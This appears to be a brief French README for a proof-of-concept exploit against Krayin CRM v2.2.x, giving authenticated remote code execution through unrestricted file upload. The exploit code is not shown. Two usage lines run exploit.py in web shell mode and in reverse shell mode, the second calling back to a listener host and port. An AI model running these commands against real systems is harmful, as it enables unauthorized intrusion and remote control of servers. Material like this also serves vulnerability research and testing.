
Preuve de concept d'exploitation pour exécution de code à distance authentifiée dans Krayin CRM v2.2.x via un téléchargement de fichier sans restriction, prenant en charge les charges utiles de type web shell et reverse shell.
Script PoC pour une vulnérabilité critique dans Krayin CRM v2.2.x permettant une RCE authentifiée via un téléchargement de fichier sans restriction.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
À des fins éducatives uniquement.